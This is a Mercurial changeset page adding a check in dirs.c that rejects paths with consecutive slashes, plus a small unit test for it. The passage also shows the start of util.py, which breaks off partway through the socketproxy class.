##// END OF EJS Templates
dirs: reject consecutive slashes in paths...
Augie Fackler -
r43799:5d40317d default
parent child Browse files
Show More
@@ -0,0 +1,27 b''
1 from __future__ import absolute_import
2
3 import unittest
4
5 import silenttestrunner
6
7 from mercurial import util
8
9
10 class dirstests(unittest.TestCase):
11 def testdirs(self):
12 for case, want in [
13 (b'a/a/a', [b'a', b'a/a', b'']),
14 (b'alpha/beta/gamma', [b'', b'alpha', b'alpha/beta']),
15 ]:
16 d = util.dirs({})
17 d.addpath(case)
18 self.assertEqual(sorted(d), sorted(want))
19
20 def testinvalid(self):
21 with self.assertRaises(ValueError):
22 d = util.dirs({})
23 d.addpath(b'a//b')
24
25
26 if __name__ == '__main__':
27 silenttestrunner.main(__name__)
@@ -1,305 +1,313 b''
1 1 /*
2 2 dirs.c - dynamic directory diddling for dirstates
3 3
4 4 Copyright 2013 Facebook
5 5
6 6 This software may be used and distributed according to the terms of
7 7 the GNU General Public License, incorporated herein by reference.
8 8 */
9 9
10 10 #define PY_SSIZE_T_CLEAN
11 11 #include <Python.h>
12 12
13 13 #include "util.h"
14 14
15 15 #ifdef IS_PY3K
16 16 #define PYLONG_VALUE(o) ((PyLongObject *)o)->ob_digit[1]
17 17 #else
18 18 #define PYLONG_VALUE(o) PyInt_AS_LONG(o)
19 19 #endif
20 20
21 21 /*
22 22 * This is a multiset of directory names, built from the files that
23 23 * appear in a dirstate or manifest.
24 24 *
25 25 * A few implementation notes:
26 26 *
27 27 * We modify Python integers for refcounting, but those integers are
28 28 * never visible to Python code.
29 29 */
30 30 /* clang-format off */
31 31 typedef struct {
32 32 PyObject_HEAD
33 33 PyObject *dict;
34 34 } dirsObject;
35 35 /* clang-format on */
36 36
37 37 static inline Py_ssize_t _finddir(const char *path, Py_ssize_t pos)
38 38 {
39 39 while (pos != -1) {
40 40 if (path[pos] == '/')
41 41 break;
42 42 pos -= 1;
43 43 }
44 44 if (pos == -1) {
45 45 return 0;
46 46 }
47 47
48 48 return pos;
49 49 }
50 50
51 51 static int _addpath(PyObject *dirs, PyObject *path)
52 52 {
53 53 const char *cpath = PyBytes_AS_STRING(path);
54 54 Py_ssize_t pos = PyBytes_GET_SIZE(path);
55 55 PyObject *key = NULL;
56 56 int ret = -1;
57 57
58 58 /* This loop is super critical for performance. That's why we inline
59 59 * access to Python structs instead of going through a supported API.
60 60 * The implementation, therefore, is heavily dependent on CPython
61 61 * implementation details. We also commit violations of the Python
62 62 * "protocol" such as mutating immutable objects. But since we only
63 63 * mutate objects created in this function or in other well-defined
64 64 * locations, the references are known so these violations should go
65 65 * unnoticed. */
66 66 while ((pos = _finddir(cpath, pos - 1)) != -1) {
67 67 PyObject *val;
68 68
69 /* Sniff for trailing slashes, a marker of an invalid input. */
70 if (pos > 0 && cpath[pos - 1] == '/') {
71 PyErr_SetString(
72 PyExc_ValueError,
73 "found invalid consecutive slashes in path");
74 goto bail;
75 }
76
69 77 key = PyBytes_FromStringAndSize(cpath, pos);
70 78 if (key == NULL)
71 79 goto bail;
72 80
73 81 val = PyDict_GetItem(dirs, key);
74 82 if (val != NULL) {
75 83 PYLONG_VALUE(val) += 1;
76 84 Py_CLEAR(key);
77 85 break;
78 86 }
79 87
80 88 /* Force Python to not reuse a small shared int. */
81 89 #ifdef IS_PY3K
82 90 val = PyLong_FromLong(0x1eadbeef);
83 91 #else
84 92 val = PyInt_FromLong(0x1eadbeef);
85 93 #endif
86 94
87 95 if (val == NULL)
88 96 goto bail;
89 97
90 98 PYLONG_VALUE(val) = 1;
91 99 ret = PyDict_SetItem(dirs, key, val);
92 100 Py_DECREF(val);
93 101 if (ret == -1)
94 102 goto bail;
95 103 Py_CLEAR(key);
96 104 }
97 105 ret = 0;
98 106
99 107 bail:
100 108 Py_XDECREF(key);
101 109
102 110 return ret;
103 111 }
104 112
105 113 static int _delpath(PyObject *dirs, PyObject *path)
106 114 {
107 115 char *cpath = PyBytes_AS_STRING(path);
108 116 Py_ssize_t pos = PyBytes_GET_SIZE(path);
109 117 PyObject *key = NULL;
110 118 int ret = -1;
111 119
112 120 while ((pos = _finddir(cpath, pos - 1)) != -1) {
113 121 PyObject *val;
114 122
115 123 key = PyBytes_FromStringAndSize(cpath, pos);
116 124
117 125 if (key == NULL)
118 126 goto bail;
119 127
120 128 val = PyDict_GetItem(dirs, key);
121 129 if (val == NULL) {
122 130 PyErr_SetString(PyExc_ValueError,
123 131 "expected a value, found none");
124 132 goto bail;
125 133 }
126 134
127 135 if (--PYLONG_VALUE(val) <= 0) {
128 136 if (PyDict_DelItem(dirs, key) == -1)
129 137 goto bail;
130 138 } else
131 139 break;
132 140 Py_CLEAR(key);
133 141 }
134 142 ret = 0;
135 143
136 144 bail:
137 145 Py_XDECREF(key);
138 146
139 147 return ret;
140 148 }
141 149
142 150 static int dirs_fromdict(PyObject *dirs, PyObject *source, char skipchar)
143 151 {
144 152 PyObject *key, *value;
145 153 Py_ssize_t pos = 0;
146 154
147 155 while (PyDict_Next(source, &pos, &key, &value)) {
148 156 if (!PyBytes_Check(key)) {
149 157 PyErr_SetString(PyExc_TypeError, "expected string key");
150 158 return -1;
151 159 }
152 160 if (skipchar) {
153 161 if (!dirstate_tuple_check(value)) {
154 162 PyErr_SetString(PyExc_TypeError,
155 163 "expected a dirstate tuple");
156 164 return -1;
157 165 }
158 166 if (((dirstateTupleObject *)value)->state == skipchar)
159 167 continue;
160 168 }
161 169
162 170 if (_addpath(dirs, key) == -1)
163 171 return -1;
164 172 }
165 173
166 174 return 0;
167 175 }
168 176
169 177 static int dirs_fromiter(PyObject *dirs, PyObject *source)
170 178 {
171 179 PyObject *iter, *item = NULL;
172 180 int ret;
173 181
174 182 iter = PyObject_GetIter(source);
175 183 if (iter == NULL)
176 184 return -1;
177 185
178 186 while ((item = PyIter_Next(iter)) != NULL) {
179 187 if (!PyBytes_Check(item)) {
180 188 PyErr_SetString(PyExc_TypeError, "expected string");
181 189 break;
182 190 }
183 191
184 192 if (_addpath(dirs, item) == -1)
185 193 break;
186 194 Py_CLEAR(item);
187 195 }
188 196
189 197 ret = PyErr_Occurred() ? -1 : 0;
190 198 Py_DECREF(iter);
191 199 Py_XDECREF(item);
192 200 return ret;
193 201 }
194 202
195 203 /*
196 204 * Calculate a refcounted set of directory names for the files in a
197 205 * dirstate.
198 206 */
199 207 static int dirs_init(dirsObject *self, PyObject *args)
200 208 {
201 209 PyObject *dirs = NULL, *source = NULL;
202 210 char skipchar = 0;
203 211 int ret = -1;
204 212
205 213 self->dict = NULL;
206 214
207 215 if (!PyArg_ParseTuple(args, "|Oc:__init__", &source, &skipchar))
208 216 return -1;
209 217
210 218 dirs = PyDict_New();
211 219
212 220 if (dirs == NULL)
213 221 return -1;
214 222
215 223 if (source == NULL)
216 224 ret = 0;
217 225 else if (PyDict_Check(source))
218 226 ret = dirs_fromdict(dirs, source, skipchar);
219 227 else if (skipchar)
220 228 PyErr_SetString(PyExc_ValueError,
221 229 "skip character is only supported "
222 230 "with a dict source");
223 231 else
224 232 ret = dirs_fromiter(dirs, source);
225 233
226 234 if (ret == -1)
227 235 Py_XDECREF(dirs);
228 236 else
229 237 self->dict = dirs;
230 238
231 239 return ret;
232 240 }
233 241
234 242 PyObject *dirs_addpath(dirsObject *self, PyObject *args)
235 243 {
236 244 PyObject *path;
237 245
238 246 if (!PyArg_ParseTuple(args, "O!:addpath", &PyBytes_Type, &path))
239 247 return NULL;
240 248
241 249 if (_addpath(self->dict, path) == -1)
242 250 return NULL;
243 251
244 252 Py_RETURN_NONE;
245 253 }
246 254
247 255 static PyObject *dirs_delpath(dirsObject *self, PyObject *args)
248 256 {
249 257 PyObject *path;
250 258
251 259 if (!PyArg_ParseTuple(args, "O!:delpath", &PyBytes_Type, &path))
252 260 return NULL;
253 261
254 262 if (_delpath(self->dict, path) == -1)
255 263 return NULL;
256 264
257 265 Py_RETURN_NONE;
258 266 }
259 267
260 268 static int dirs_contains(dirsObject *self, PyObject *value)
261 269 {
262 270 return PyBytes_Check(value) ? PyDict_Contains(self->dict, value) : 0;
263 271 }
264 272
265 273 static void dirs_dealloc(dirsObject *self)
266 274 {
267 275 Py_XDECREF(self->dict);
268 276 PyObject_Del(self);
269 277 }
270 278
271 279 static PyObject *dirs_iter(dirsObject *self)
272 280 {
273 281 return PyObject_GetIter(self->dict);
274 282 }
275 283
276 284 static PySequenceMethods dirs_sequence_methods;
277 285
278 286 static PyMethodDef dirs_methods[] = {
279 287 {"addpath", (PyCFunction)dirs_addpath, METH_VARARGS, "add a path"},
280 288 {"delpath", (PyCFunction)dirs_delpath, METH_VARARGS, "remove a path"},
281 289 {NULL} /* Sentinel */
282 290 };
283 291
284 292 static PyTypeObject dirsType = {PyVarObject_HEAD_INIT(NULL, 0)};
285 293
286 294 void dirs_module_init(PyObject *mod)
287 295 {
288 296 dirs_sequence_methods.sq_contains = (objobjproc)dirs_contains;
289 297 dirsType.tp_name = "parsers.dirs";
290 298 dirsType.tp_new = PyType_GenericNew;
291 299 dirsType.tp_basicsize = sizeof(dirsObject);
292 300 dirsType.tp_dealloc = (destructor)dirs_dealloc;
293 301 dirsType.tp_as_sequence = &dirs_sequence_methods;
294 302 dirsType.tp_flags = Py_TPFLAGS_DEFAULT;
295 303 dirsType.tp_doc = "dirs";
296 304 dirsType.tp_iter = (getiterfunc)dirs_iter;
297 305 dirsType.tp_methods = dirs_methods;
298 306 dirsType.tp_init = (initproc)dirs_init;
299 307
300 308 if (PyType_Ready(&dirsType) < 0)
301 309 return;
302 310 Py_INCREF(&dirsType);
303 311
304 312 PyModule_AddObject(mod, "dirs", (PyObject *)&dirsType);
305 313 }
@@ -1,3660 +1,3664 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import mmap
26 26 import os
27 27 import platform as pyplatform
28 28 import re as remod
29 29 import shutil
30 30 import socket
31 31 import stat
32 32 import sys
33 33 import time
34 34 import traceback
35 35 import warnings
36 36
37 37 from .thirdparty import attr
38 38 from .pycompat import (
39 39 delattr,
40 40 getattr,
41 41 open,
42 42 setattr,
43 43 )
44 44 from hgdemandimport import tracing
45 45 from . import (
46 46 encoding,
47 47 error,
48 48 i18n,
49 49 node as nodemod,
50 50 policy,
51 51 pycompat,
52 52 urllibcompat,
53 53 )
54 54 from .utils import (
55 55 compression,
56 56 procutil,
57 57 stringutil,
58 58 )
59 59
60 60 rustdirs = policy.importrust(r'dirstate', r'Dirs')
61 61
62 62 base85 = policy.importmod(r'base85')
63 63 osutil = policy.importmod(r'osutil')
64 64 parsers = policy.importmod(r'parsers')
65 65
66 66 b85decode = base85.b85decode
67 67 b85encode = base85.b85encode
68 68
69 69 cookielib = pycompat.cookielib
70 70 httplib = pycompat.httplib
71 71 pickle = pycompat.pickle
72 72 safehasattr = pycompat.safehasattr
73 73 socketserver = pycompat.socketserver
74 74 bytesio = pycompat.bytesio
75 75 # TODO deprecate stringio name, as it is a lie on Python 3.
76 76 stringio = bytesio
77 77 xmlrpclib = pycompat.xmlrpclib
78 78
79 79 httpserver = urllibcompat.httpserver
80 80 urlerr = urllibcompat.urlerr
81 81 urlreq = urllibcompat.urlreq
82 82
83 83 # workaround for win32mbcs
84 84 _filenamebytestr = pycompat.bytestr
85 85
86 86 if pycompat.iswindows:
87 87 from . import windows as platform
88 88 else:
89 89 from . import posix as platform
90 90
91 91 _ = i18n._
92 92
93 93 bindunixsocket = platform.bindunixsocket
94 94 cachestat = platform.cachestat
95 95 checkexec = platform.checkexec
96 96 checklink = platform.checklink
97 97 copymode = platform.copymode
98 98 expandglobs = platform.expandglobs
99 99 getfsmountpoint = platform.getfsmountpoint
100 100 getfstype = platform.getfstype
101 101 groupmembers = platform.groupmembers
102 102 groupname = platform.groupname
103 103 isexec = platform.isexec
104 104 isowner = platform.isowner
105 105 listdir = osutil.listdir
106 106 localpath = platform.localpath
107 107 lookupreg = platform.lookupreg
108 108 makedir = platform.makedir
109 109 nlinks = platform.nlinks
110 110 normpath = platform.normpath
111 111 normcase = platform.normcase
112 112 normcasespec = platform.normcasespec
113 113 normcasefallback = platform.normcasefallback
114 114 openhardlinks = platform.openhardlinks
115 115 oslink = platform.oslink
116 116 parsepatchoutput = platform.parsepatchoutput
117 117 pconvert = platform.pconvert
118 118 poll = platform.poll
119 119 posixfile = platform.posixfile
120 120 readlink = platform.readlink
121 121 rename = platform.rename
122 122 removedirs = platform.removedirs
123 123 samedevice = platform.samedevice
124 124 samefile = platform.samefile
125 125 samestat = platform.samestat
126 126 setflags = platform.setflags
127 127 split = platform.split
128 128 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
129 129 statisexec = platform.statisexec
130 130 statislink = platform.statislink
131 131 umask = platform.umask
132 132 unlink = platform.unlink
133 133 username = platform.username
134 134
135 135 # small compat layer
136 136 compengines = compression.compengines
137 137 SERVERROLE = compression.SERVERROLE
138 138 CLIENTROLE = compression.CLIENTROLE
139 139
140 140 try:
141 141 recvfds = osutil.recvfds
142 142 except AttributeError:
143 143 pass
144 144
145 145 # Python compatibility
146 146
147 147 _notset = object()
148 148
149 149
150 150 def bitsfrom(container):
151 151 bits = 0
152 152 for bit in container:
153 153 bits |= bit
154 154 return bits
155 155
156 156
157 157 # python 2.6 still have deprecation warning enabled by default. We do not want
158 158 # to display anything to standard user so detect if we are running test and
159 159 # only use python deprecation warning in this case.
160 160 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
161 161 if _dowarn:
162 162 # explicitly unfilter our warning for python 2.7
163 163 #
164 164 # The option of setting PYTHONWARNINGS in the test runner was investigated.
165 165 # However, module name set through PYTHONWARNINGS was exactly matched, so
166 166 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
167 167 # makes the whole PYTHONWARNINGS thing useless for our usecase.
168 168 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
169 169 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
170 170 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
171 171 if _dowarn and pycompat.ispy3:
172 172 # silence warning emitted by passing user string to re.sub()
173 173 warnings.filterwarnings(
174 174 r'ignore', r'bad escape', DeprecationWarning, r'mercurial'
175 175 )
176 176 warnings.filterwarnings(
177 177 r'ignore', r'invalid escape sequence', DeprecationWarning, r'mercurial'
178 178 )
179 179 # TODO: reinvent imp.is_frozen()
180 180 warnings.filterwarnings(
181 181 r'ignore',
182 182 r'the imp module is deprecated',
183 183 DeprecationWarning,
184 184 r'mercurial',
185 185 )
186 186
187 187
188 188 def nouideprecwarn(msg, version, stacklevel=1):
189 189 """Issue an python native deprecation warning
190 190
191 191 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
192 192 """
193 193 if _dowarn:
194 194 msg += (
195 195 b"\n(compatibility will be dropped after Mercurial-%s,"
196 196 b" update your code.)"
197 197 ) % version
198 198 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
199 199
200 200
201 201 DIGESTS = {
202 202 b'md5': hashlib.md5,
203 203 b'sha1': hashlib.sha1,
204 204 b'sha512': hashlib.sha512,
205 205 }
206 206 # List of digest types from strongest to weakest
207 207 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
208 208
209 209 for k in DIGESTS_BY_STRENGTH:
210 210 assert k in DIGESTS
211 211
212 212
213 213 class digester(object):
214 214 """helper to compute digests.
215 215
216 216 This helper can be used to compute one or more digests given their name.
217 217
218 218 >>> d = digester([b'md5', b'sha1'])
219 219 >>> d.update(b'foo')
220 220 >>> [k for k in sorted(d)]
221 221 ['md5', 'sha1']
222 222 >>> d[b'md5']
223 223 'acbd18db4cc2f85cedef654fccc4a4d8'
224 224 >>> d[b'sha1']
225 225 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
226 226 >>> digester.preferred([b'md5', b'sha1'])
227 227 'sha1'
228 228 """
229 229
230 230 def __init__(self, digests, s=b''):
231 231 self._hashes = {}
232 232 for k in digests:
233 233 if k not in DIGESTS:
234 234 raise error.Abort(_(b'unknown digest type: %s') % k)
235 235 self._hashes[k] = DIGESTS[k]()
236 236 if s:
237 237 self.update(s)
238 238
239 239 def update(self, data):
240 240 for h in self._hashes.values():
241 241 h.update(data)
242 242
243 243 def __getitem__(self, key):
244 244 if key not in DIGESTS:
245 245 raise error.Abort(_(b'unknown digest type: %s') % k)
246 246 return nodemod.hex(self._hashes[key].digest())
247 247
248 248 def __iter__(self):
249 249 return iter(self._hashes)
250 250
251 251 @staticmethod
252 252 def preferred(supported):
253 253 """returns the strongest digest type in both supported and DIGESTS."""
254 254
255 255 for k in DIGESTS_BY_STRENGTH:
256 256 if k in supported:
257 257 return k
258 258 return None
259 259
260 260
261 261 class digestchecker(object):
262 262 """file handle wrapper that additionally checks content against a given
263 263 size and digests.
264 264
265 265 d = digestchecker(fh, size, {'md5': '...'})
266 266
267 267 When multiple digests are given, all of them are validated.
268 268 """
269 269
270 270 def __init__(self, fh, size, digests):
271 271 self._fh = fh
272 272 self._size = size
273 273 self._got = 0
274 274 self._digests = dict(digests)
275 275 self._digester = digester(self._digests.keys())
276 276
277 277 def read(self, length=-1):
278 278 content = self._fh.read(length)
279 279 self._digester.update(content)
280 280 self._got += len(content)
281 281 return content
282 282
283 283 def validate(self):
284 284 if self._size != self._got:
285 285 raise error.Abort(
286 286 _(b'size mismatch: expected %d, got %d')
287 287 % (self._size, self._got)
288 288 )
289 289 for k, v in self._digests.items():
290 290 if v != self._digester[k]:
291 291 # i18n: first parameter is a digest name
292 292 raise error.Abort(
293 293 _(b'%s mismatch: expected %s, got %s')
294 294 % (k, v, self._digester[k])
295 295 )
296 296
297 297
298 298 try:
299 299 buffer = buffer
300 300 except NameError:
301 301
302 302 def buffer(sliceable, offset=0, length=None):
303 303 if length is not None:
304 304 return memoryview(sliceable)[offset : offset + length]
305 305 return memoryview(sliceable)[offset:]
306 306
307 307
308 308 _chunksize = 4096
309 309
310 310
311 311 class bufferedinputpipe(object):
312 312 """a manually buffered input pipe
313 313
314 314 Python will not let us use buffered IO and lazy reading with 'polling' at
315 315 the same time. We cannot probe the buffer state and select will not detect
316 316 that data are ready to read if they are already buffered.
317 317
318 318 This class let us work around that by implementing its own buffering
319 319 (allowing efficient readline) while offering a way to know if the buffer is
320 320 empty from the output (allowing collaboration of the buffer with polling).
321 321
322 322 This class lives in the 'util' module because it makes use of the 'os'
323 323 module from the python stdlib.
324 324 """
325 325
326 326 def __new__(cls, fh):
327 327 # If we receive a fileobjectproxy, we need to use a variation of this
328 328 # class that notifies observers about activity.
329 329 if isinstance(fh, fileobjectproxy):
330 330 cls = observedbufferedinputpipe
331 331
332 332 return super(bufferedinputpipe, cls).__new__(cls)
333 333
334 334 def __init__(self, input):
335 335 self._input = input
336 336 self._buffer = []
337 337 self._eof = False
338 338 self._lenbuf = 0
339 339
340 340 @property
341 341 def hasbuffer(self):
342 342 """True is any data is currently buffered
343 343
344 344 This will be used externally a pre-step for polling IO. If there is
345 345 already data then no polling should be set in place."""
346 346 return bool(self._buffer)
347 347
348 348 @property
349 349 def closed(self):
350 350 return self._input.closed
351 351
352 352 def fileno(self):
353 353 return self._input.fileno()
354 354
355 355 def close(self):
356 356 return self._input.close()
357 357
358 358 def read(self, size):
359 359 while (not self._eof) and (self._lenbuf < size):
360 360 self._fillbuffer()
361 361 return self._frombuffer(size)
362 362
363 363 def unbufferedread(self, size):
364 364 if not self._eof and self._lenbuf == 0:
365 365 self._fillbuffer(max(size, _chunksize))
366 366 return self._frombuffer(min(self._lenbuf, size))
367 367
368 368 def readline(self, *args, **kwargs):
369 369 if len(self._buffer) > 1:
370 370 # this should not happen because both read and readline end with a
371 371 # _frombuffer call that collapse it.
372 372 self._buffer = [b''.join(self._buffer)]
373 373 self._lenbuf = len(self._buffer[0])
374 374 lfi = -1
375 375 if self._buffer:
376 376 lfi = self._buffer[-1].find(b'\n')
377 377 while (not self._eof) and lfi < 0:
378 378 self._fillbuffer()
379 379 if self._buffer:
380 380 lfi = self._buffer[-1].find(b'\n')
381 381 size = lfi + 1
382 382 if lfi < 0: # end of file
383 383 size = self._lenbuf
384 384 elif len(self._buffer) > 1:
385 385 # we need to take previous chunks into account
386 386 size += self._lenbuf - len(self._buffer[-1])
387 387 return self._frombuffer(size)
388 388
389 389 def _frombuffer(self, size):
390 390 """return at most 'size' data from the buffer
391 391
392 392 The data are removed from the buffer."""
393 393 if size == 0 or not self._buffer:
394 394 return b''
395 395 buf = self._buffer[0]
396 396 if len(self._buffer) > 1:
397 397 buf = b''.join(self._buffer)
398 398
399 399 data = buf[:size]
400 400 buf = buf[len(data) :]
401 401 if buf:
402 402 self._buffer = [buf]
403 403 self._lenbuf = len(buf)
404 404 else:
405 405 self._buffer = []
406 406 self._lenbuf = 0
407 407 return data
408 408
409 409 def _fillbuffer(self, size=_chunksize):
410 410 """read data to the buffer"""
411 411 data = os.read(self._input.fileno(), size)
412 412 if not data:
413 413 self._eof = True
414 414 else:
415 415 self._lenbuf += len(data)
416 416 self._buffer.append(data)
417 417
418 418 return data
419 419
420 420
421 421 def mmapread(fp):
422 422 try:
423 423 fd = getattr(fp, 'fileno', lambda: fp)()
424 424 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
425 425 except ValueError:
426 426 # Empty files cannot be mmapped, but mmapread should still work. Check
427 427 # if the file is empty, and if so, return an empty buffer.
428 428 if os.fstat(fd).st_size == 0:
429 429 return b''
430 430 raise
431 431
432 432
433 433 class fileobjectproxy(object):
434 434 """A proxy around file objects that tells a watcher when events occur.
435 435
436 436 This type is intended to only be used for testing purposes. Think hard
437 437 before using it in important code.
438 438 """
439 439
440 440 __slots__ = (
441 441 r'_orig',
442 442 r'_observer',
443 443 )
444 444
445 445 def __init__(self, fh, observer):
446 446 object.__setattr__(self, r'_orig', fh)
447 447 object.__setattr__(self, r'_observer', observer)
448 448
449 449 def __getattribute__(self, name):
450 450 ours = {
451 451 r'_observer',
452 452 # IOBase
453 453 r'close',
454 454 # closed if a property
455 455 r'fileno',
456 456 r'flush',
457 457 r'isatty',
458 458 r'readable',
459 459 r'readline',
460 460 r'readlines',
461 461 r'seek',
462 462 r'seekable',
463 463 r'tell',
464 464 r'truncate',
465 465 r'writable',
466 466 r'writelines',
467 467 # RawIOBase
468 468 r'read',
469 469 r'readall',
470 470 r'readinto',
471 471 r'write',
472 472 # BufferedIOBase
473 473 # raw is a property
474 474 r'detach',
475 475 # read defined above
476 476 r'read1',
477 477 # readinto defined above
478 478 # write defined above
479 479 }
480 480
481 481 # We only observe some methods.
482 482 if name in ours:
483 483 return object.__getattribute__(self, name)
484 484
485 485 return getattr(object.__getattribute__(self, r'_orig'), name)
486 486
487 487 def __nonzero__(self):
488 488 return bool(object.__getattribute__(self, r'_orig'))
489 489
490 490 __bool__ = __nonzero__
491 491
492 492 def __delattr__(self, name):
493 493 return delattr(object.__getattribute__(self, r'_orig'), name)
494 494
495 495 def __setattr__(self, name, value):
496 496 return setattr(object.__getattribute__(self, r'_orig'), name, value)
497 497
498 498 def __iter__(self):
499 499 return object.__getattribute__(self, r'_orig').__iter__()
500 500
501 501 def _observedcall(self, name, *args, **kwargs):
502 502 # Call the original object.
503 503 orig = object.__getattribute__(self, r'_orig')
504 504 res = getattr(orig, name)(*args, **kwargs)
505 505
506 506 # Call a method on the observer of the same name with arguments
507 507 # so it can react, log, etc.
508 508 observer = object.__getattribute__(self, r'_observer')
509 509 fn = getattr(observer, name, None)
510 510 if fn:
511 511 fn(res, *args, **kwargs)
512 512
513 513 return res
514 514
515 515 def close(self, *args, **kwargs):
516 516 return object.__getattribute__(self, r'_observedcall')(
517 517 r'close', *args, **kwargs
518 518 )
519 519
520 520 def fileno(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'fileno', *args, **kwargs
523 523 )
524 524
525 525 def flush(self, *args, **kwargs):
526 526 return object.__getattribute__(self, r'_observedcall')(
527 527 r'flush', *args, **kwargs
528 528 )
529 529
530 530 def isatty(self, *args, **kwargs):
531 531 return object.__getattribute__(self, r'_observedcall')(
532 532 r'isatty', *args, **kwargs
533 533 )
534 534
535 535 def readable(self, *args, **kwargs):
536 536 return object.__getattribute__(self, r'_observedcall')(
537 537 r'readable', *args, **kwargs
538 538 )
539 539
540 540 def readline(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'readline', *args, **kwargs
543 543 )
544 544
545 545 def readlines(self, *args, **kwargs):
546 546 return object.__getattribute__(self, r'_observedcall')(
547 547 r'readlines', *args, **kwargs
548 548 )
549 549
550 550 def seek(self, *args, **kwargs):
551 551 return object.__getattribute__(self, r'_observedcall')(
552 552 r'seek', *args, **kwargs
553 553 )
554 554
555 555 def seekable(self, *args, **kwargs):
556 556 return object.__getattribute__(self, r'_observedcall')(
557 557 r'seekable', *args, **kwargs
558 558 )
559 559
560 560 def tell(self, *args, **kwargs):
561 561 return object.__getattribute__(self, r'_observedcall')(
562 562 r'tell', *args, **kwargs
563 563 )
564 564
565 565 def truncate(self, *args, **kwargs):
566 566 return object.__getattribute__(self, r'_observedcall')(
567 567 r'truncate', *args, **kwargs
568 568 )
569 569
570 570 def writable(self, *args, **kwargs):
571 571 return object.__getattribute__(self, r'_observedcall')(
572 572 r'writable', *args, **kwargs
573 573 )
574 574
575 575 def writelines(self, *args, **kwargs):
576 576 return object.__getattribute__(self, r'_observedcall')(
577 577 r'writelines', *args, **kwargs
578 578 )
579 579
580 580 def read(self, *args, **kwargs):
581 581 return object.__getattribute__(self, r'_observedcall')(
582 582 r'read', *args, **kwargs
583 583 )
584 584
585 585 def readall(self, *args, **kwargs):
586 586 return object.__getattribute__(self, r'_observedcall')(
587 587 r'readall', *args, **kwargs
588 588 )
589 589
590 590 def readinto(self, *args, **kwargs):
591 591 return object.__getattribute__(self, r'_observedcall')(
592 592 r'readinto', *args, **kwargs
593 593 )
594 594
595 595 def write(self, *args, **kwargs):
596 596 return object.__getattribute__(self, r'_observedcall')(
597 597 r'write', *args, **kwargs
598 598 )
599 599
600 600 def detach(self, *args, **kwargs):
601 601 return object.__getattribute__(self, r'_observedcall')(
602 602 r'detach', *args, **kwargs
603 603 )
604 604
605 605 def read1(self, *args, **kwargs):
606 606 return object.__getattribute__(self, r'_observedcall')(
607 607 r'read1', *args, **kwargs
608 608 )
609 609
610 610
611 611 class observedbufferedinputpipe(bufferedinputpipe):
612 612 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
613 613
614 614 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
615 615 bypass ``fileobjectproxy``. Because of this, we need to make
616 616 ``bufferedinputpipe`` aware of these operations.
617 617
618 618 This variation of ``bufferedinputpipe`` can notify observers about
619 619 ``os.read()`` events. It also re-publishes other events, such as
620 620 ``read()`` and ``readline()``.
621 621 """
622 622
623 623 def _fillbuffer(self):
624 624 res = super(observedbufferedinputpipe, self)._fillbuffer()
625 625
626 626 fn = getattr(self._input._observer, 'osread', None)
627 627 if fn:
628 628 fn(res, _chunksize)
629 629
630 630 return res
631 631
632 632 # We use different observer methods because the operation isn't
633 633 # performed on the actual file object but on us.
634 634 def read(self, size):
635 635 res = super(observedbufferedinputpipe, self).read(size)
636 636
637 637 fn = getattr(self._input._observer, 'bufferedread', None)
638 638 if fn:
639 639 fn(res, size)
640 640
641 641 return res
642 642
643 643 def readline(self, *args, **kwargs):
644 644 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
645 645
646 646 fn = getattr(self._input._observer, 'bufferedreadline', None)
647 647 if fn:
648 648 fn(res)
649 649
650 650 return res
651 651
652 652
653 653 PROXIED_SOCKET_METHODS = {
654 654 r'makefile',
655 655 r'recv',
656 656 r'recvfrom',
657 657 r'recvfrom_into',
658 658 r'recv_into',
659 659 r'send',
660 660 r'sendall',
661 661 r'sendto',
662 662 r'setblocking',
663 663 r'settimeout',
664 664 r'gettimeout',
665 665 r'setsockopt',
666 666 }
667 667
668 668
669 669 class socketproxy(object):
670 670 """A proxy around a socket that tells a watcher when events occur.
671 671
672 672 This is like ``fileobjectproxy`` except for sockets.
673 673
674 674 This type is intended to only be used for testing purposes. Think hard
675 675 before using it in important code.
676 676 """
677 677
678 678 __slots__ = (
679 679 r'_orig',
680 680 r'_observer',
681 681 )
682 682
683 683 def __init__(self, sock, observer):
684 684 object.__setattr__(self, r'_orig', sock)
685 685 object.__setattr__(self, r'_observer', observer)
686 686
687 687 def __getattribute__(self, name):
688 688 if name in PROXIED_SOCKET_METHODS:
689 689 return object.__getattribute__(self, name)
690 690
691 691 return getattr(object.__getattribute__(self, r'_orig'), name)
692 692
693 693 def __delattr__(self, name):
694 694 return delattr(object.__getattribute__(self, r'_orig'), name)
695 695
696 696 def __setattr__(self, name, value):
697 697 return setattr(object.__getattribute__(self, r'_orig'), name, value)
698 698
699 699 def __nonzero__(self):
700 700 return bool(object.__getattribute__(self, r'_orig'))
701 701
702 702 __bool__ = __nonzero__
703 703
704 704 def _observedcall(self, name, *args, **kwargs):
705 705 # Call the original object.
